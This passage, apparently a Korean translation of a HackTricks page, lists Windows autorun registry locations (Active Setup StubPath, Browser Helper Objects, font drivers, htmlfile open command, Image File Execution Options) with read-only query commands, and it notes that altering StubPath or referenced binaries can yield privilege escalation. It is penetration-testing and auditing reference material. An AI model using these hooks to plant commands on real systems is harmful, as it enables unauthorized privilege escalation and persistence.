์ด ํ‚ค๋“ค ๋‚ด์—๋Š” ๊ฐ ํŠน์ • ๊ตฌ์„ฑ ์š”์†Œ์— ํ•ด๋‹นํ•˜๋Š” ๋‹ค์–‘ํ•œ ํ•˜์œ„ ํ‚ค๊ฐ€ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ํŠนํžˆ ๊ด€์‹ฌ ์žˆ๋Š” ํ‚ค ๊ฐ’์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  • IsInstalled:
  • 0์€ ๊ตฌ์„ฑ ์š”์†Œ์˜ ๋ช…๋ น์ด ์‹คํ–‰๋˜์ง€ ์•Š์Œ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค.
  • 1์€ ๋ช…๋ น์ด ๊ฐ ์‚ฌ์šฉ์ž์— ๋Œ€ํ•ด ํ•œ ๋ฒˆ ์‹คํ–‰๋จ์„ ์˜๋ฏธํ•˜๋ฉฐ, ์ด๋Š” IsInstalled ๊ฐ’์ด ์—†์„ ๊ฒฝ์šฐ์˜ ๊ธฐ๋ณธ ๋™์ž‘์ž…๋‹ˆ๋‹ค.
  • StubPath: Active Setup์— ์˜ํ•ด ์‹คํ–‰๋  ๋ช…๋ น์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” notepad๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ๊ณผ ๊ฐ™์€ ์œ ํšจํ•œ ๋ช…๋ น์ค„์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ณด์•ˆ ํ†ต์ฐฐ:

  • **IsInstalled**๊ฐ€ "1"๋กœ ์„ค์ •๋œ ํ‚ค๋ฅผ ํŠน์ • **StubPath**๋กœ ์ˆ˜์ •ํ•˜๊ฑฐ๋‚˜ ์“ฐ๋Š” ๊ฒƒ์€ ๋ฌด๋‹จ ๋ช…๋ น ์‹คํ–‰์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • ์–ด๋–ค StubPath ๊ฐ’์—์„œ ์ฐธ์กฐ๋œ ์ด์ง„ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜๋Š” ๊ฒƒ๋„ ์ถฉ๋ถ„ํ•œ ๊ถŒํ•œ์ด ์ฃผ์–ด์ง€๋ฉด ๊ถŒํ•œ ์ƒ์Šน์„ ๋‹ฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Active Setup ๊ตฌ์„ฑ ์š”์†Œ ์ „๋ฐ˜์— ๊ฑธ์ณ StubPath ๊ตฌ์„ฑ์„ ๊ฒ€์‚ฌํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath

Browser Helper Objects

Overview of Browser Helper Objects (BHOs)

Browser Helper Objects (BHOs)๋Š” Microsoft์˜ Internet Explorer์— ์ถ”๊ฐ€ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•˜๋Š” DLL ๋ชจ๋“ˆ์ž…๋‹ˆ๋‹ค. ์ด๋“ค์€ ๋งค๋ฒˆ ์‹œ์ž‘ํ•  ๋•Œ Internet Explorer์™€ Windows Explorer์— ๋กœ๋“œ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ NoExplorer ํ‚ค๋ฅผ 1๋กœ ์„ค์ •ํ•˜๋ฉด ์‹คํ–‰์ด ์ฐจ๋‹จ๋˜์–ด Windows Explorer ์ธ์Šคํ„ด์Šค์™€ ํ•จ๊ป˜ ๋กœ๋“œ๋˜์ง€ ์•Š๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

BHOs๋Š” Internet Explorer 11์„ ํ†ตํ•ด Windows 10๊ณผ ํ˜ธํ™˜๋˜์ง€๋งŒ, ์ตœ์‹  ๋ฒ„์ „์˜ Windows์—์„œ ๊ธฐ๋ณธ ๋ธŒ๋ผ์šฐ์ €์ธ Microsoft Edge์—์„œ๋Š” ์ง€์›๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

์‹œ์Šคํ…œ์— ๋“ฑ๋ก๋œ BHOs๋ฅผ ํƒ์ƒ‰ํ•˜๋ ค๋ฉด ๋‹ค์Œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ๊ฒ€์‚ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

๊ฐ BHO๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ ๊ณ ์œ  ์‹๋ณ„์ž๋กœ์„œ CLSID๋กœ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. ๊ฐ CLSID์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” HKLM\SOFTWARE\Classes\CLSID\{<CLSID>} ์•„๋ž˜์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ BHOs๋ฅผ ์ฟผ๋ฆฌํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s

Internet Explorer ํ™•์žฅ

  • HKLM\Software\Microsoft\Internet Explorer\Extensions
  • HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—๋Š” ๊ฐ dll๋งˆ๋‹ค 1๊ฐœ์˜ ์ƒˆ๋กœ์šด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๊ฐ€ ํฌํ•จ๋˜๋ฉฐ, ์ด๋Š” CLSID๋กœ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. CLSID ์ •๋ณด๋Š” HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ธ€๊ผด ๋“œ๋ผ์ด๋ฒ„

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers
  • HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'

Open Command

  • HKLM\SOFTWARE\Classes\htmlfile\shell\open\command
  • HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""

์ด๋ฏธ์ง€ ํŒŒ์ผ ์‹คํ–‰ ์˜ต์…˜

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options

SysInternals

๋ชจ๋“  autoruns๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ์‚ฌ์ดํŠธ๋Š” ์ด๋ฏธ winpeas.exe๋กœ ๊ฒ€์ƒ‰๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ๋” ํฌ๊ด„์ ์ธ ์ž๋™ ์‹คํ–‰ ํŒŒ์ผ ๋ชฉ๋ก์„ ์›ํ•˜์‹ ๋‹ค๋ฉด Sysinternals์˜ autoruns๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

autorunsc.exe -m -nobanner -a * -ct /accepteula

More

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์™€ ๊ฐ™์€ Autoruns๋ฅผ ๋” ์ฐพ์œผ์„ธ์š” https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ